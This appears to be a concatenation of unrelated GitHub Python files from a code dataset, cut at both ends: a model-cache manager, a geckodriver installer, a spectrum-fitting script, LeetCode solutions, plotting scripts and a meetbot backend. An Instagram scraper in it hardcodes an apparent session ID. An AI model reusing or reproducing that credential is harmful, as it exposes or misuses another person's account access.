int(csv_df['filename'].iloc[-1].split('.')[0])\n next_file_name = str(current_file_number + 1).zfill(5) + '.p'\n new_df = pd.DataFrame(\n {\"filename\": [next_file_name], \"encoded\": [encode_data_name], \"decoded\": [decode_data]})\n csv_df = csv_df.append(new_df)\n csv_df.to_csv(self.lookup_table_file, index=False)\n\n def load_csv(self):\n if not os.path.exists(self.lookup_table_file):\n print(\"No csv table exist yet for data model.\")\n return -1\n else:\n return pd.read_csv(self.lookup_table_file)\n\n def get_pickle_name(self, datatype=\"model\"):\n csv_df = self.load_csv()\n encode_data_name = self.encode(datatype, return_pickle=True, return_compact=False)\n try:\n pickled_file_name = csv_df.loc[csv_df['encoded'] == encode_data_name]['filename'].values[0]\n return pickled_file_name\n except Exception as e:\n print(e)\n return -1\n\n def load_model(self, datatype=\"model\"):\n print(self.lookup_table_folder)\n print(self.get_pickle_name(datatype))\n with open(os.path.join(self.lookup_table_folder, self.get_pickle_name(datatype)), mode=\"rb\") as f:\n return dill.load(f)\n\n def load_encoded_model(self, encoded=\"\"):\n csv_df = self.load_csv()\n pickled_file_name = csv_df.loc[csv_df['encoded'] == encoded]['filename'].values[0]\n with open(os.path.join(self.lookup_table_folder, pickled_file_name), mode=\"rb\") as f:\n return dill.load(f)\n\n def save_model(self, model, datatype=\"model\"):\n self.update_csv(datatype)\n with open(os.path.join(self.lookup_table_folder, self.get_pickle_name(datatype)), mode=\"wb\") as f:\n dill.dump(model, f)\n\n def exist_model(self, datatype=\"model\"):\n if self.get_pickle_name(datatype) == -1:\n return False\n else:\n return True\n\n def wrap(self, method, datatype=\"data\", *args, **data_params):\n if self.exist_model(method.__name__+datatype):\n print(\"Data model existed, loading from pickle...\")\n x = self.load_model(datatype=method.__name__+datatype)\n else:\n x = method(*args, **data_params)\n print(\"Saving data model...\")\n self.save_model(x, datatype=method.__name__+datatype)\n return x\n","repo_name":"bangxiangyong/baetorch","sub_path":"baetorch/util/data_model_manager.py","file_name":"data_model_manager.py","file_ext":"py","file_size_in_byte":4543,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"37"} +{"seq_id":"6011548321","text":"import requests\nfrom bs4 import BeautifulSoup\nimport platform\nimport os\nfrom zipfile import ZipFile\nimport shutil\n\ncurrent_os = str(platform.system())\n\ndef get_gecko_pkg_name():\n #navigate to latest geckodriver release page\n page = requests.get(\"https://github.com/mozilla/geckodriver/releases/latest\")\n pagesoup = BeautifulSoup(page.content, 'html.parser')\n\n latest_version = \"v\" + pagesoup.find('h2').text.split()[0] #extract latest version\n\n current_sys_arch = platform.architecture()[0] \n\n #determine the system arch of file to download\n if current_os.lower() == \"windows\":\n if current_sys_arch == \"64bit\":\n pkg_arch = \"win64\"\n elif current_sys_arch == \"32bit\":\n pkg_arch = \"win32\"\n \n extension = \"zip\"\n \n elif current_os.lower() == \"linux\":\n if current_sys_arch == \"64bit\":\n pkg_arch = \"linux64\"\n elif current_sys_arch == \"32bit\":\n pkg_arch = \"linux32\"\n \n extension = \"tar.gz\"\n\n gecko_pkg_name = f\"geckodriver-{latest_version}-{pkg_arch}.{extension}\"\n\n return gecko_pkg_name\n\ndef create_folder(to_location):\n #make a new folder to download to (if one doesn't already exist)\n new_folder = os.path.join(to_location, r'geckodriver')\n if not os.path.exists(new_folder):\n os.makedirs(new_folder)\n \n return new_folder #path to where the file will be downloaded\n\ndef download_package(download_path, gecko_dl_link, gecko_package_name):\n #download the package\n save_as = os.path.join(download_path, gecko_package_name) #save file as\n\n if not os.path.exists(save_as):\n r = requests.get(gecko_dl_link, stream=True)\n with open(save_as, 'wb') as fd:\n for chunk in r.iter_content(chunk_size=128):\n fd.write(chunk)\n \n return save_as #path to downloaded zip\n\n\ndef extract_zip(gecko_zip, geckodriver_dir):\n #extract zip file\n gecko_file = os.path.join(geckodriver_dir, r\"geckodriver.exe\")\n\n if os.path.exists(gecko_file): #remove file if file already exists\n os.remove(gecko_file)\n \n with ZipFile(gecko_zip, 'r') as zip:\n zip.extractall(geckodriver_dir) #extract content to geckodriver_dir\n\n return gecko_file\n\ndef extract_tar_gz(gecko_tar_gz, geckodriver_dir):\n #extract *.tar.gz\n gecko_file = os.path.join(geckodriver_dir, r\"geckodriver\")\n\n if os.path.exists(gecko_file):\n os.remove(gecko_file)\n\n shutil.unpack_archive(gecko_tar_gz, geckodriver_dir) #extract *.tar.gz\n\n return gecko_file\n\ndef add_to_PATH(path_of_dir):\n if path_of_dir not in os.environ['PATH']: #add the dir containing geckodriver to PATH\n os.environ['PATH'] = os.environ['PATH'] + os.pathsep + path_of_dir\n\ndef install(to_location):\n package_name = get_gecko_pkg_name()\n gecko_dl_link = f\"https://github.com/mozilla/geckodriver/releases/download/v0.29.1/{package_name}\"\n\n geckodriver_dir = create_folder(to_location)\n\n gecko_pkg = download_package(geckodriver_dir, gecko_dl_link, package_name) #download zip file to download_path\n\n if current_os.lower() == \"windows\":\n gecko_file = extract_zip(gecko_pkg, geckodriver_dir) #extracts downloaded zip\n elif current_os.lower() == \"linux\":\n gecko_file = extract_tar_gz(gecko_pkg, geckodriver_dir) #extracts downloaded tar.gz file\n\n add_to_PATH(geckodriver_dir) #add geckodriver to path","repo_name":"gandalf-the-lonesome/animepahe-dlr","sub_path":"animepahe_dlr/gecko_installer.py","file_name":"gecko_installer.py","file_ext":"py","file_size_in_byte":3396,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"6374076871","text":"import numpy as n\nimport matplotlib as m\nm.interactive(True)\nfrom matplotlib import pyplot as p\nfrom astropy.io import fits\nimport os\nimport pixelsplines as pxs\n\n# Script to test new SSPs from Charlie Conroy, obtained 2014A\n#\n# Written by A. Bolton, U. of Utah\n\n# Set these environment variables:\n# export BOSS_SPECTRO_REDUX=/data/BOSS/redux/dr10mini\n# export RUN2D=v5_5_12\n# export RUN1D=v5_5_12\n# export SSP_DATA_DIR=/data/SSP\n\n# Get a spectrum to work with:\nplate = 4388\nmjd = 55536\nspf = os.getenv('BOSS_SPECTRO_REDUX') + '/' + os.getenv('RUN2D') + \\\n '/' + str(plate) + '/spPlate-' + str(plate) + '-' + str(mjd) + '.fits'\n\nflux = fits.getdata(spf, 0)\ninvvar = fits.getdata(spf, 1)\nhdr = fits.getheader(spf)\nloglam = hdr['COEFF0'] + hdr['COEFF1'] * n.arange(hdr['NAXIS1'])\nn_fib, n_data = flux.shape\nifiber = 100\np.plot(10**loglam, flux[ifiber], hold=False)\n\n\n# Get the solar-metallicity SSP:\nsspf = os.getenv('SSP_DATA_DIR') + '/SSP_Padova_CKC14_new_Kroupa_Z0.0190.out.fits'\nssp_data = fits.getdata(sspf, 1)\nssp_meta = fits.getdata(sspf, 2)\nssp_wave = ssp_data['LAMBDA'][0].copy()\nssp_flux = ssp_data['SPEC'][0].copy()\nn_age, n_pix = ssp_flux.shape\n\n# Convert from fnu to flambda with arbitrary normalization:\nfor i in range(n_age):\n ssp_flux[i] /= ssp_wave**2\n ssp_flux[i] /= n.median(ssp_flux[i])\n\n# Check it out, to see if it looks like we expect:\ni_age = 170\np.plot(ssp_wave, ssp_flux[i_age], hold=False)\np.xlim(1800.,11000.)\n\n\n# Pick out some wavelength range of interest:\n# Nah, not worth it...\n#lam_lo = 1750.\n#lam_hi = 11000.\n#ilam_lo = min(n.where(ssp_wave >= lam_lo)[0])\n#ilam_hi = max(n.where(ssp_wave <= lam_hi)[0])\n\n# Does a blur matrix at this stage give us something tractable?\nvdisp = 225. # (in km/s)\nc_in_km_per_s = 299792.458\nsigconv = ssp_wave * vdisp / c_in_km_per_s\nssp_bound = pxs.cen2bound(ssp_wave)\ngblur = pxs.gauss_blur_matrix(ssp_bound, sigconv)\n\nssp_blur = gblur * ssp_flux[i_age]\np.plot(ssp_wave, ssp_flux[i_age], hold=False)\np.plot(ssp_wave, ssp_blur, hold=True)\np.xlim(1800.,11000.)\n\n# Looks good.\n# Now let's bin it down to the BOSS coadd resoultion\n# and dial in the wavelength range we want.\nsspSpline = pxs.PixelSpline(ssp_bound, ssp_blur)\n\nssp_coeff0 = 3.225\nssp_coeff1 = 0.0001\nssp_naxis1 = 2**13\nssp_loglam = ssp_coeff0 + ssp_coeff1 * n.arange(ssp_naxis1)\nprint(10.**ssp_loglam.min(), 10.**ssp_loglam.max())\nssp_logbound = pxs.cen2bound(ssp_loglam)\nssp_wavebound = 10.**ssp_logbound\n\nssp_boss = sspSpline.resample(ssp_wavebound)\n\np.plot(10.**ssp_loglam, ssp_boss, hold=False)\n\n# Test speed of FFTs from Numpy:\njunk1 = n.random.uniform(size=2**17)\njunk2 = n.random.uniform(size=(2**17-1))\nf_junk1 = n.fft.fft(junk1)\nf_junk2 = n.fft.fft(junk2)\n# It definitely matters to have power-of-two!!\n\n# Another test of the FFT convolution convention:\njunk1 = n.zeros(128, dtype=float)\njunk2 = n.zeros(128, dtype=float)\njunk1[0] = 1.\njunk2[0] = 2.\nf_junk1 = n.fft.fft(junk1)\nf_junk2 = n.fft.fft(junk2)\njunk3 = n.fft.ifft(f_junk1 * f_junk2)\n\n# Yet another test of the FFT convolution convention:\njunk1 = n.random.uniform(size=128)\njunk2 = n.random.uniform(size=128)\nf_junk1 = n.fft.fft(junk1)\nf_junk2 = n.fft.fft(junk2)\njunk3 = n.fft.ifft(f_junk1.conj() * f_junk2).real\njunk4 = n.convolve(junk1, junk2)\n\np.plot(junk3, hold=False)\np.plot(junk4, hold=True)\n\n\n# And another test of the FFT convolution convention:\njunk1 = n.random.uniform(size=128)\njunk2 = 0.1*n.random.uniform(size=128)\n#f_junk1 = n.fft.fft(junk1)\n#f_junk2 = n.fft.fft(junk2)\n#junk3 = n.fft.ifft(f_junk1 * f_junk2).real\nf_junk1 = n.fft.fft(junk1)\nf_junk2 = n.fft.fft(junk2)\njunk3 = n.fft.ifft(f_junk1 * f_junk2.conj()).real\njunk4 = n.zeros(128,dtype=float)\nfor i in range(128):\n junk4[i] = n.sum(junk1 * n.roll(junk2,i))\n\np.plot(junk3, hold=False)\np.plot(junk4, hold=True)\n\n# OK, that does what we want, I think!!\n\n\n\n# Make a padded version of the data and invvar:\ndata_pad = n.zeros(ssp_naxis1, dtype=float)\ndata_pad[0:len(flux[ifiber])] = flux[ifiber]\ninvvar_pad = n.zeros(ssp_naxis1, dtype=float)\ninvvar_pad[0:len(invvar[ifiber])] = invvar[ifiber]\n\n# Generate simple polynomial basis:\nnpoly = 3\npoly_base = n.arange(ssp_naxis1, dtype=float) / float(ssp_naxis1-1)\npoly_set = n.zeros((npoly,ssp_naxis1), dtype=float)\nfor i in range(npoly):\n poly_set[i] = poly_base**i\n\n# The FFTs we need:\nivar_fft = n.fft.fft(invvar_pad)\nt_fft = n.fft.fft(ssp_boss)\nt2_fft = n.fft.fft(ssp_boss**2)\npoly_fft = n.zeros((npoly, ssp_naxis1), dtype=complex)\nfor i in range(npoly):\n poly_fft[i] = n.fft.fft(poly_set[i] * invvar_pad)\n\ndata_fft = n.fft.fft(data_pad * invvar_pad)\n\n# Build and populate the array of inversion matrices and right-hand sides:\nalpha_big = n.zeros((npoly+1,npoly+1,ssp_naxis1), dtype=float)\nrhs_big = n.zeros((npoly+1,ssp_naxis1), dtype=float)\nalpha_big[0,0] = n.fft.ifft(t2_fft * ivar_fft.conj()).real\nrhs_big[0] = n.fft.ifft(t_fft * data_fft.conj()).real\nfor i in range(npoly):\n alpha_big[i+1,0] = alpha_big[0,i+1] = n.fft.ifft(t_fft * poly_fft[i].conj()).real\n\nipoly_set = poly_set * invvar_pad.reshape((1,-1))\nalpha_poly = n.tensordot(poly_set, ipoly_set, (1,1))\nrhs_poly = n.sum(poly_set * data_pad.reshape((1,-1)) * invvar_pad.reshape((1,-1)), axis=1)\n\nalpha_big[1:,1:] = alpha_poly.reshape((npoly,npoly,1)) * n.ones((1,1,ssp_naxis1))\nrhs_big[1:] = rhs_poly.reshape((npoly,1)) * n.ones((1,ssp_naxis1))\n\n# Test these to see if they give the same numbers as one expects\n# from straight calculation, for the zero-lag case:\nprint(n.sum(ssp_boss**2 * invvar_pad), alpha_big[0,0,0])\nprint(n.sum(ssp_boss * poly_set[0] * invvar_pad), alpha_big[0,1,0], alpha_big[1,0,0])\nprint(n.sum(ssp_boss * poly_set[1] * invvar_pad), alpha_big[0,2,0], alpha_big[2,0,0])\nprint(n.sum(ssp_boss * poly_set[2] * invvar_pad), alpha_big[0,3,0], alpha_big[3,0,0])\nprint(n.sum(ssp_boss * data_pad * invvar_pad), rhs_big[0,0])\nprint(n.sum(poly_set[1] * poly_set[2] * invvar_pad), alpha_big[2,3,0], alpha_big[3,2,0])\nprint(n.sum(poly_set[1] * data_pad * invvar_pad), rhs_big[2,0])\n\n# Number of redshifts to consider:\nn_z = ssp_naxis1 - n_data + 1\n\n# Here's where we find out if we're making sense...\nsn_squared = n.zeros(n_z, dtype=float)\n\nfor i in range(n_z):\n coeffs = n.linalg.solve(alpha_big[:,:,i], rhs_big[:,i])\n sn_squared[i] = n.dot(coeffs, n.dot(alpha_big[:,:,i], coeffs))\n\nchisq = n.sum(data_pad**2 * invvar_pad) - sn_squared\n\nbestlag = n.argmin(chisq)\n\nzbase = 10.**loglam[0] / 10.**ssp_loglam[0:n_z] - 1\n\nzbase[bestlag]\n\n# Revisit at the best lag and look explicitly at model:\nbest_coeffs = n.linalg.solve(alpha_big[:,:,bestlag], rhs_big[:,bestlag])\nbest_basis = n.zeros((npoly+1,n_data), dtype=float)\nbest_basis[0] = ssp_boss[bestlag:bestlag+n_data]\nbest_basis[1:] = poly_set[:,0:n_data]\nbest_model = n.dot(best_coeffs, best_basis)\np.plot(10.**loglam, flux[ifiber], hold=False)\np.plot(10.**loglam, best_model, hold=True)\n\nprint(n.sum((flux[ifiber]-best_model)**2 * invvar[ifiber]), chisq[bestlag])\n\n","repo_name":"timahutchinson/redmonster","sub_path":"python/redmonster/sandbox/test_ssp_2014.py","file_name":"test_ssp_2014.py","file_ext":"py","file_size_in_byte":6916,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"69878271787","text":"class Solution:\n def findLengthOfLCIS(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n res = 0\n anchor = 0\n i = 0\n while i < len(nums):\n if i > 0 and nums[i - 1] >= nums[i]:\n anchor = i\n else:\n res = max(res, i - anchor + 1)\n i += 1\n print(anchor, res)\n return res\n\n\nnums = [1, 2, 4, 3]\ns = Solution()\nprint(s.findLengthOfLCIS(nums))\n","repo_name":"hotheat/LeetCode","sub_path":"674. Longest Continuous Increasing Subsequence/better.py","file_name":"better.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"9690112568","text":"import pandas as pd\nfrom instagramy import InstagramUser\nfrom collections import defaultdict\nfrom datetime import datetime\nfrom google.cloud import storage\n\n\ndef main():\n print(\"starting function\")\n\n def upload_blob(bucket_name, blob_text, destination_blob_name):\n \"\"\"Uploads a file to the bucket.\"\"\"\n storage_client = storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(destination_blob_name)\n\n blob.upload_from_string(blob_text, content_type='text/csv')\n\n print('File uploaded to {}.'.format(destination_blob_name))\n\n # Changement manuel du sessionid pour l'instant\n session_id = \"51744929721%3ARmvyDanBisbGGN%3A2\"\n instagram_target_username = 'selenagomez'\n\n user = InstagramUser(instagram_target_username, sessionid=session_id)\n\n # Récupération informations sur le compte\n infos_dict = defaultdict(list)\n\n infos_dict[\"username\"].append(user.username)\n infos_dict[\"biography\"].append(user.biography)\n infos_dict[\"number_of_followers\"].append(user.number_of_followers)\n infos_dict[\"number_of_followings\"].append(user.number_of_followings)\n infos_dict[\"number_of_posts\"].append(user.number_of_posts)\n infos_dict[\"is_verified\"].append(user.is_verified)\n\n infos_df = pd.DataFrame(infos_dict)\n infos_csv = infos_df.to_csv()\n # Créer un dataframe contenant tout ses posts dans un dataframe\n posts_dict = defaultdict(list)\n posts = user.posts\n\n for post in posts:\n # Ajouter à une list de numpy array, chacun des attributs dont on a besoin\n posts_dict[\"post_url\"].append(post.post_url)\n posts_dict[\"likes\"].append(post.likes)\n posts_dict[\"comments\"].append(post.comments)\n posts_dict[\"is_video\"].append(post.is_video)\n posts_dict[\"caption\"].append(post.caption)\n posts_dict[\"location\"].append(post.location)\n posts_dict[\"post_source\"].append(post.post_source)\n posts_dict[\"timestamp\"].append(datetime.fromtimestamp(post.timestamp))\n posts_dict[\"shortcode\"].append(post.shortcode)\n\n posts_df = pd.DataFrame(posts_dict)\n posts_csv = posts_df.to_csv()\n\n upload_blob('reda-bucket-tf', infos_csv, f'{instagram_target_username}-infos.csv')\n upload_blob('reda-bucket-tf', posts_csv, f'{instagram_target_username}-posts.csv')\n print(\"infos and posts sent to buckets\")\n\n\nmain()\n","repo_name":"reda-maizate/cloud-big-data","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36642096905","text":"'''\nWorkflow Timestamps\n1. 0:00 - 3:03 Make Sure You Understand the Problem\n2. 3:30 - 12:35 Design a Solution / Runtime and Space Complexity\n3. 12:35 - 17:05 Write a Template for Code in Logical Blocks. Aka Pseudocode\n4. 17:05 - 48:28 Write the Code And Pass Test Cases.\n'''\n'''\n1. Make Sure You Understand the Problem\n\n2. Design a Solution / Runtime and Space Complexity\nInitialize a map starting with first string as key, with an itslef as first value in list strs[0]:strs[0]. \nLoop through remaining strings. Get map.keys() and compare current string to each keys\nuse Counter() object to check if counts are same and is an anagram, add to values list, else add as a new key\nFor each value in map.values() append to outpout list\nRuntime:()\nSpace: O(N)\n3. Write a Template for Code in Logical Blocks. Aka Pseudocode\n# Initialize anagrams map\nanagrams = {first string:List[first string]}\n\nfor s in strs[1:]:\n check each string against anagrams.keys()\n Create two counter objects from s and cur_key\n if anagrams add s to anagrams key values list\n else add s as new key and add itself as first value in list\n\nanagrams_groups = []\n# Create output list \nfor value in anagrams.values():\n anagrams_groups.append(value)\nreturn anagrams_groups\n4. Write the Code And Pass Test Cases.\n'''\nfrom collections import Counter\n\ndef str_counts(s):\n counts = [0] * 26\n\n for c in s:\n counts[ord(c) - ord('a')] += 1 \n\n\n # Convert to string to use as hashable key\n return str(counts)\n\nclass Solution:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n # Initialize anagrams map with first string \n anagrams = {str_counts(strs[0]):[strs[0]]}\n \n # Anagram found flag\n anagram_found = False\n for s in strs[1:]:\n s_counts = str_counts(s)\n # Convert to string to check against hashed keys\n \n # Check if any keys are an anagram of current s\n if s_counts in anagrams:\n anagrams[s_counts].append(s)\n anagram_found = True\n \n if not anagram_found:\n anagrams[s_counts] = [s]\n # Reset anagram flag for next string\n anagram_found = False\n \n return anagrams.values()","repo_name":"balanced-energy/leetcode","sub_path":"0049-group-anagrams/0049-group-anagrams.py","file_name":"0049-group-anagrams.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43321756795","text":"print(\"Hello World\")\n\nanswer = 42\nname = \"Python\"\n\nprint(f\"I have been developing in {name} for {answer} days\")\n\nnumber = 5\nif number == 5:\n print(\"Number is 5\")\nelse:\n print(\"Number is not 5\")\n\n\nmy_list = [\"John\", \"Luke\", \"Mary\", \"Joseph\"]\n\nlen(my_list)\ndel my_list[0]\n\nfor i in my_list:\n print(\"The students is {0}\".format(i))\n\nx = 0\nwhile x <= 10:\n print(\"Count is {0}\".format(x))\n x += 1\n\nstudent = {\n \"name\": \"Mark\",\n \"student_id\": 123210,\n \"feedback\": None\n}\n\ntry:\n number_plus_name = name + answer\nexcept KeyError:\n print(\"Error finding last_name\")\nexcept Exception as error: #Exception is too broad on its own\n print(\"Unknown Error: \")\n print(error)\n\n\n","repo_name":"KeithMc18/FirstProject","sub_path":"Base.py","file_name":"Base.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14792372757","text":"# Direct from TG's PR (https://github.com/tgstation/tgstation/pull/36492)\n# May bump up quality and rate slightly...\nRECOMPRESS_ARGS = [\n # Audio Codec\n '-c:a', 'libvorbis',\n # Force to mono (should already be, since festival outputs mono...)\n '-ac', '1',\n # Sampling rate in Hz. TG uses 16kHz.\n '-ar', '16000',\n # Audio quality [0,9]. TG uses 0.\n '-q:a', '0',\n # Playback speed\n '-speed', '0',\n # Number of threads to use. This works OK on my laptop, but you may need fewer\n # Now specified in -j.\n #'-threads', '8',\n # Force overwrite\n '-y']\n\n# Have to do the trimming seperately.\nPRE_SOX_ARGS = 'trim 0 -0.1' # Trim off last 0.2s.\n","repo_name":"N3X15/ss13-vox","sub_path":"ss13vox/consts.py","file_name":"consts.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"37"} +{"seq_id":"40657128940","text":"\ndef solution(babbling):\n answer = 0\n speakable = [\"aya\", \"ye\", \"woo\", \"ma\"]\n for i in range(len(babbling)):\n for j in range(len(speakable)):\n if speakable[j] in babbling[i]:\n babbling[i] = babbling[i].replace(speakable[j], '1')\n if babbling[i].isdecimal():\n answer += 1\n return answer\n\nif __name__ == '__main__':\n test = [\"aya\", \"yee\", \"u\", \"maa\", \"wyeoo\"]\n print(solution(test))","repo_name":"Nachokang/Algorithm_practice","sub_path":"Programmers/Level0/babbling.py","file_name":"babbling.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74937204266","text":"import dataclasses\n\n\n@dataclasses.dataclass\nclass Piece:\n piece_id: str\n block_id: int\n start: int\n length: int\n owner: str\n\n def _get_fields(self):\n return [getattr(self, field) for field in self.__annotations__]\n\n def __iter__(self):\n for field in self._get_fields():\n yield field\n","repo_name":"psedit/cte","sub_path":"src/server/services/piece.py","file_name":"piece.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"28056563632","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np \r\nfrom scipy import stats\r\n\r\ndata1 = pd.read_csv(\"benchmarking_system_1.csv\")\r\ndata2 = pd.read_csv(\"benchmarking_system_2.csv\")\r\ndata3 = pd.read_csv(\"benchmarking_system_3.csv\")\r\ndata4 = pd.read_csv(\"benchmarking_system_4.csv\")\r\ndata5 = pd.read_csv(\"benchmarking_system_5.csv\")\r\n#Filter an insignifant number of outliers\r\ndata5 = data5[data5[\"User Execution Time with Bloom Filters (s)\"] < 4.6]\r\ndata6 = pd.read_csv(\"benchmarking_system_6.csv\")\r\n\r\ndata = [data1, data2, data3, data4, data5, data6]\r\n\r\nreal_optimized = pd.concat([df[\"User Execution Time with Bloom Filters (s)\"] + df[\"System Execution Time with Bloom Filters (s)\"] for df in data])\r\n\r\nnum_users = pd.concat([df[\"Number of Users in System\"] for df in data])\r\n\r\nreal_unoptimized = pd.concat([df[\"User Execution Time without Bloom Filters (s)\"] + df[\"System Execution Time without Bloom Filters (s)\"] for df in data])\r\n\r\n\r\nplt.scatter(num_users, real_unoptimized, s=15, label = \"System without Bloom Filters (1)\")\r\nplt.scatter(num_users, real_optimized, s=15, label = \"System with Bloom Filters (2)\")\r\nplt.scatter(num_users, real_unoptimized - real_optimized, s= 15, label=\"Difference in Execution Times between (1) and (2)\")\r\n\r\n#slope, intercept, r_value, p_value, std_err = stats.linregress(num_users,real_unoptimized)\r\n#plt.annotate('y = {:.3e}x - {:.3e}\\nR\\u00b2 = {:.3f}'.format(slope, abs(intercept), r_value**2), xy=(0.46, 0.65), xycoords='figure fraction', color='darkblue', size=7)\r\n#plt.plot(num_users, slope*num_users+intercept, linestyle='--', color='darkblue')\r\n\r\n#slope, intercept, r_value, p_value, std_err = stats.linregress(num_users,real_optimized)\r\n#plt.annotate('y = {:.3e}x - {:.3e}\\nR\\u00b2 = {:.3f}'.format(slope, abs(intercept), r_value**2), xy=(0.69, 0.60), xycoords='figure fraction', color='orangered', size=7)\r\n#plt.plot(num_users, slope*num_users+intercept, linestyle='--', color='orangered')\r\n\r\n#slope, intercept, r_value, p_value, std_err = stats.linregress(num_users,real_unoptimized - real_optimized)\r\n#plt.annotate('y = {:.3e}x + {:.3e}\\nR\\u00b2 = {:.3f}'.format(slope, intercept, r_value**2), xy=(0.57, 0.25), xycoords='figure fraction', color='limegreen', size=7)\r\n#plt.plot(num_users, slope*num_users+intercept, linestyle='--', color='limegreen')\r\n\r\nplt.title(\"Execution Time of Aggregate Query for Different Number of Users\")\r\nplt.xlabel(\"Number of Users\")\r\nplt.ylabel(\"Execution Time (s)\")\r\nplt.legend()\r\nplt.show()\r\nplt.savefig('Scatter Plot.png')","repo_name":"Shirley-L-Sanchez/private_db","sub_path":"aggregate_query_benchmarking_self_contained/benchmarking_scatter_plot.py","file_name":"benchmarking_scatter_plot.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"45513375118","text":"\"\"\"\nthis should go through directory tree comparison/* and plot the optimized\nportfolio performance versus the hodl performances\n\"\"\"\n\nimport os\nimport pandas as pd\nimport global_vars\n\nimport plotly.graph_objs as go\nfrom plotly.offline import plot\n\n\n# discover results csv\nsampled_sectors_dir = os.listdir(\"comparisons\")\nfor sector_dir in sampled_sectors_dir:\n csv_files = os.listdir(os.path.join(\"comparisons\", sector_dir))\n print(\"Plotting for {}\".format(sector_dir))\n\n # extract the optimized file\n # optimized = \"optimized_\" + sector_dir + \".csv\"\n # equal_weights = \"equal_weights\" + sector_dir + \".csv\"\n # csv_files.remove(optimized)\n # csv_files.remove(equal_weights)\n\n traces = []\n for idx, csv in enumerate(csv_files):\n # figure out what type of csv this is\n if \"optimized_\" in csv:\n trace_name = \"optimized_portfolio\"\n dash = \"longdash\"\n elif \"equal_weights_\" in csv:\n trace_name = \"equal_weights\"\n dash = \"dash\"\n else:\n # it's a hodl trace\n trace_name = csv.split('.')[0]\n dash = \"solid\"\n\n df = pd.read_csv(os.path.join(\"comparisons\", sector_dir, csv),\n header=None,\n names=[\"date\", \"portfolio_value\"])\n traces.append(go.Scatter(\n x=df['date'],\n y=df['portfolio_value'],\n mode=\"lines\",\n name=trace_name,\n line=dict(\n color=global_vars.colors[idx],\n dash=dash,\n smoothing=1.2\n )\n ))\n\n # plot each sector\n trace_filename = sector_dir + \"_portfolios_compared.html\"\n sector_title = sector_dir.replace('_', ' ').title()\n layout = go.Layout(\n title=sector_title,\n xaxis=dict(\n title='Date',\n showticklabels=True,\n tickangle=45\n ),\n yaxis=dict(\n title='Portfolio Value (BTC)',\n showticklabels=True,\n tickangle=45\n )\n )\n fig = go.Figure(data=traces, layout=layout)\n print(\"Plot for {0} saved to {1}\".format(sector_title, trace_filename))\n plot(fig, filename=trace_filename)\n","repo_name":"wphan/cryptocurrency_market_analysis","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22363364402","text":"import json\nimport tempfile\nfrom datetime import datetime\n\nimport jinja2\nimport requests\n\nfrom ...util import get_room_alias, get_room_name, time_from_timestamp\n\n\n# helpers\ndef config(meetbot):\n config = meetbot.config[\"backend_data\"][\"ansible\"]\n return config\n\n\ndef parse_db_time(t):\n return datetime.utcfromtimestamp(int(t) / 1000).strftime(\"%Y-%m-%d %H:%M:%S\")\n\n\ndef parse_db_logs(items):\n logs = tuple()\n for row in items:\n time = parse_db_time(row[1])\n log = f\"{time} | {row[2]} | {row[3]}\"\n logs += (log,)\n\n log_data = \"\\n\".join(logs).encode(\"utf-8\")\n return log_data\n\n\ndef render(meetbot, templatename, **kwargs):\n def formatdate(timestamp):\n \"\"\"timestampt to date filter\"\"\"\n return time_from_timestamp(int(timestamp))\n\n def formattime(timestamp):\n \"\"\"timestampt to date filter\"\"\"\n return time_from_timestamp(int(timestamp), format=\"%H:%M:%S\")\n\n def removecommand(line, command=\"\"):\n return line.removeprefix(f\"^{command}\").strip()\n\n j2env = jinja2.Environment(\n trim_blocks=True,\n lstrip_blocks=True,\n autoescape=jinja2.select_autoescape([\"html\", \"xml\"]),\n )\n j2env.filters[\"formatdate\"] = formatdate\n j2env.filters[\"formattime\"] = formattime\n j2env.filters[\"removecommand\"] = removecommand\n\n template = meetbot.loader.sync_read_file(f\"meetings/backends/ansible/{templatename}\")\n return j2env.from_string(template.decode()).render(**kwargs)\n\n\n# async helpers\nasync def upload_log_to_discourse(config, log_data, logger):\n # DRY this\n api_user = config[\"discourse_user\"]\n api_key = config[\"discourse_key\"]\n url = config[\"discourse_url\"] + \"/uploads.json\"\n\n headers = {\"Api-Key\": api_key, \"Api-Username\": api_user}\n\n fp = tempfile.TemporaryFile()\n fp.write(str.encode(log_data))\n fp.seek(0)\n\n res = requests.post( # noqa: S113\n url,\n headers=headers,\n data={\"type\": \"text\"},\n files={\"files[]\": (\"full_log.txt\", fp, \"text/plain\")},\n )\n\n fp.close()\n\n if res.status_code == 200:\n r = json.loads(res.content)\n txt = f\"[full_log.txt|attachment]({r['short_url']})\"\n return txt\n else:\n logger.info(res.status_code)\n logger.info(res.content)\n return \"\"\n\n\nasync def post_to_discourse(config, raw_post, title, logger):\n api_user = 